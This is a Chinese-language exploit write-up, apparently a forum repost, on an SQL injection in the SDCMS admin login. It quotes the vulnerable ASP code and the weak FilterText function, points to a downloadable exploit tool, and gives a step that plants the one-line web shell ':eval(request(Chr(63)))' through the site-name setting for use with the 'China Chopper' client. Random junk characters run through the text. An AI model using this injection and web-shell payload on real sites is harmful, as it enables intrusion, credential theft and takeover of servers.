作者:T00LS 鬼哥% _9 l$ b, q0 q1 A& b* Z: A# f/ o
漏洞文件:后台目录/index.asp+ m6 x0 _4 ` p3 K; S
$ _/ Y" j/ [ g: h5 `3 MSub Check
2 k) J& \( v2 e" Q Dim username,password,code,getcode,Rs
- F7 X5 k. }* f* ~: p/ K/ q/ x( b IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
T5 m2 M1 [4 h3 P4 w username=FilterText(Trim(Request.Form("username")),1)
" e" p; o$ m/ L password=FilterText(Trim(Request.Form("password")),1)3 l; @6 }! L" ]% j
code=Trim(Request.Form("yzm"))
/ V, Y+ E1 a, `) Z getcode=Session("SDCMSCode")
: o0 t8 \# G7 p; V- i4 c7 X IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
$ S$ B9 F' e9 Z4 R4 ^: a; ~ IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied/ r, }. f* ~4 P7 M
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied- R5 g3 P; H2 `
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied
' }' F; e. ` e: k IF username="" or password="" Then9 \' h% ^8 `5 o+ W1 H
Echo "用户名或密码不能为空" ied2 A4 v6 _- c- `" c% a& j, u
Else
: f7 P" Z) J+ |* W3 n Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")* n" W+ i4 `2 C, z" v: G8 ^
IF Rs.Eof Then
0 S ^+ t7 `: j% { AddLog username,GetIp,"登录失败",1
# K( ?: z B: S& W* Y, i Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
. C) |! N l# _( Z) Y Else
9 S2 q* G4 W0 q; A2 B Add_Cookies "sdcms_id",Rs(0)- d. P/ z! _8 ?- H8 l
Add_Cookies "sdcms_name",username& w* P G m2 G% t" k! ]8 V' V
Add_Cookies "sdcms_pwd",Rs(2)
k) n( [$ S9 c Add_Cookies "sdcms_admin",Rs(3)
$ Z& m. d# A# @ Add_Cookies "sdcms_alllever",Rs(4)4 q; [$ B9 w$ Z. v, ]4 g( u+ x d
Add_Cookies "sdcms_infolever",Rs(5)
0 b: t" l$ L X3 l. r1 c! k5 y* K Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")8 o& g0 L/ B# T5 \2 {. H
AddLog username,GetIp,"登录成功",16 d+ W0 ^& B! u7 e- R& d
'自动删除30天前的Log记录
5 W1 i b1 i% W* c8 B IF Sdcms_DataType Then9 E, G" S; `/ L$ S
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")6 N& N- I& E, b1 g1 w$ q
Else
! R: {- I6 ~; s; p Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
4 _# N1 [1 ]$ d& F0 h% V2 `; r End IF% l, _+ I( H3 t7 c! z5 `
Go("sdcms_index.asp")
: }1 q3 Z& e5 f5 c+ [6 m2 Q- j* G End IF
5 y% v4 O j1 n+ v, q# D Rs.Close
6 `% \8 B m; o/ w Set Rs=Nothing! \6 P: U3 Y4 i3 @
End IF
0 b+ m/ b% g3 ^End Sub
3 {+ d! u8 U t
" _% z. |3 V& @+ X, H’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码# A; W* p( x1 w
" w9 ? u. d, AFunction FilterText(ByVal t0,ByVal t1)# f; S2 |8 u8 a8 Z' }
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function1 I: b1 M/ j5 Q& J
t0=Trim(t0)9 S0 M$ Z1 l/ g% R- z2 a7 E3 L
Select Case t1& K& ^0 Z1 v% ?, F4 N2 n
Case "1"
: h& }( H9 h$ q& I4 K: e9 l t0=Replace(t0,Chr(32),"")
, B' m3 Y1 x5 D4 D t0=Replace(t0,Chr(13),"")
3 q j, [% h- ]+ h7 |" i: j5 J t0=Replace(t0,Chr(10)&Chr(10),"")
+ i! ]' t; ~6 O; _+ w/ l t0=Replace(t0,Chr(10),"")
* |' L$ M. k: T- F/ f& M0 t9 g" D3 L Case "2"
9 q. c7 u& x) M8 l) z* N t0=Replace(t0,Chr(8),"")'回格8 q' U% n) |% D5 j- V
t0=Replace(t0,Chr(9),"")'tab(水平制表符)
- A: j" S8 F; b* E4 k. g t0=Replace(t0,Chr(10),"")'换行
4 f1 K2 k, j. Z5 L& s9 E4 d5 D5 U( I t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
/ [1 d1 O! z3 G4 v. r: d( d t0=Replace(t0,Chr(12),"")'换页
Q3 ~9 I; ?; G. T4 N- _ t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合4 G5 q W L) y
t0=Replace(t0,Chr(22),"")
; S# `8 `1 O& h5 t4 N0 |; a5 { t0=Replace(t0,Chr(32),"")'空格 SPACE* y3 C8 G1 N" j2 g
t0=Replace(t0,Chr(33),"")'!% q1 P+ k) J& u4 k
t0=Replace(t0,Chr(34),"")'"
8 w( J( D; o- y1 x7 L) F# c% p0 | t0=Replace(t0,Chr(35),"")'#: L5 ^2 S3 [. Q/ D7 \ |5 t; X
t0=Replace(t0,Chr(36),"")'$
9 u) O1 B3 f# s1 h$ X5 ? t0=Replace(t0,Chr(37),"")'%: [% a$ z9 d# A/ |, o8 o3 n/ s' x) g6 b
t0=Replace(t0,Chr(38),"")'&
# Y$ K3 h) A+ P/ M6 p" N; |( \$ P# F t0=Replace(t0,Chr(39),"")''
' \7 U: J- ?; A' @ t0=Replace(t0,Chr(40),"")'(
4 D1 G) E4 J8 A% C t0=Replace(t0,Chr(41),"")')9 w, ~' `: _" K# t& d# {5 f# m
t0=Replace(t0,Chr(42),"")'*
/ t# [- q% ^' G8 J! r* A( \' T t0=Replace(t0,Chr(43),"")'+
) Y0 K: {, Z7 w! v# o t0=Replace(t0,Chr(44),"")',/ \' T0 T; h5 E6 u( q
t0=Replace(t0,Chr(45),"")'-( _+ I) r% M* F2 q. U' D
t0=Replace(t0,Chr(46),"")'.1 t9 A4 ]2 c `
t0=Replace(t0,Chr(47),"")'/
$ A6 a% t+ ?# l& _6 { t0=Replace(t0,Chr(58),"")': X$ U" k2 ~ ]8 S1 @# L
t0=Replace(t0,Chr(59),"")';5 o; h/ [* w% \& X0 N
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
0 X Q$ n+ q# J% E$ a1 I, c t0=Replace(t0,Chr(63),"")'?0 w# k+ G) ~1 ?5 U" j) B
t0=Replace(t0,Chr(64),"")'@; o5 l% f3 T* S- g! [2 @
t0=Replace(t0,Chr(91),"")'\
$ R& Q7 q* c& ~ t0=Replace(t0,Chr(92),"")'\
1 X# G3 a$ k5 h: S8 w% R# \0 n t0=Replace(t0,Chr(93),"")']
& o& S! b% O5 r* M% s( U' W, i t0=Replace(t0,Chr(94),"")'^
9 \' J7 q4 `0 A% ^4 r2 f t0=Replace(t0,Chr(95),"")'_
) l6 ^/ e7 M% n6 B& ~ t0=Replace(t0,Chr(96),"")'`
8 ~- F! b, D# X! a' b t0=Replace(t0,Chr(123),"")'{8 k9 S# J7 N1 K3 X4 P6 W! q
t0=Replace(t0,Chr(124),"")'|; f" \+ i# y( x& w0 N- t! ?% Q* S
t0=Replace(t0,Chr(125),"")'}
! p/ n' v6 G9 D- _5 `- K3 Z& F t0=Replace(t0,Chr(126),"")'~
* S2 H( ?! K! E& v$ x; W; q0 Y Case Else+ @4 h8 I+ @* _( _1 W7 a
t0=Replace(t0, "&", "&")2 ~4 Y" d% H- ^( h- [6 {% m
t0=Replace(t0, "'", "'")
4 ~* L9 h( D9 y3 _/ y. v1 f t0=Replace(t0, """", """)
+ \ a" j+ z" F) F$ Q+ w) d t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
6 R) P. ]' E6 u9 b/ x5 z$ h End Select
% l1 a o& n; U3 D! s* R& i" A# f IF Instr(Lcase(t0),"expression")>0 Then
9 @+ e8 r) S6 H4 W t0=Replace(t0,"expression","e­xpression", 1, -1, 0)4 Y0 R0 O) \) j0 i/ W
End If$ c' O4 n3 l0 F' w% m2 O
FilterText=t0* U: d% ]! [% Y9 T& W7 }5 [3 c
End Function
- {8 ?3 X' Z) j" _8 M1 X9 P5 I {% f3 o' C" e/ |# `; ?* f
看到没。直接参数是1 只过滤
! y* H( \! [ u; m( d: h t0=Replace(t0,Chr(32)," ")4 _* d7 ^ i- l
t0=Replace(t0,Chr(13),"")
7 d( [+ N2 a) ?# \. g t0=Replace(t0,Chr(10)&Chr(10),"
8 F+ V$ Z6 G, L7 P1 V")% g# |4 W h0 {3 k
t0=Replace(t0,Chr(10),", U0 ^' ?* u; R8 E
")
0 o- `/ s" t; |8 i+ p: ]- `3 X; A漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!) P# o) P4 j$ |! ^6 ]4 X
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP3 s& u% {; i S, Z, d9 O: x
- R( w; Q; u1 H7 D3 R
测试:: I3 z! j+ j: R, y+ ^
' d1 b3 h# B% e; v
( P$ ^+ z- |' e1 i: G现在输入工具上验证码,然后点OK
, B, T$ C5 z8 R k% c+ w
3 L& p$ u$ `( k$ W- Q* N. g
$ M* J5 D U7 n* d. j) J看到我们直接进入后台管理界面了,呵呵!
" |0 ?/ j# ~! N% R8 _
1 g# v' u2 z$ \) k1 j. P
& u/ x2 ~, j+ v0 G1 U* D+ A1 d
1 ~" W- H! F" N! S1 D8 M$ @这样直接进入后台了。。。。
4 W, F* B8 u1 Z {. ]# T2 e2 U
% p5 T) ^& _) \ ]/ { G/ A/ I & l( [" _0 ?8 |) ?* N8 _
# J' P1 ?8 Q, ]% U% g n5 \, c. YSDCMS提权:
! _# X5 G2 u" J
$ b3 {% c0 p& {! Z方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
0 B4 A) M4 T' `/ K7 _. u5 G( L. Y" S" X- {
1 u. r U& Y8 i; O; L& E1 [; y2 G( m* J* X5 }: E' I% D! J
OK,现在用菜刀连接下!
( d+ i7 L, O; W
; d% K4 @5 ^& q5 ^& y2 t
8 c" H; y* v: d" K M2 Z
& t% m2 D& N3 H6 D0 s
. X) z! ~0 n$ ]0 I1 K. Y- \/ Z$ v/ _' q& e/ @* \
|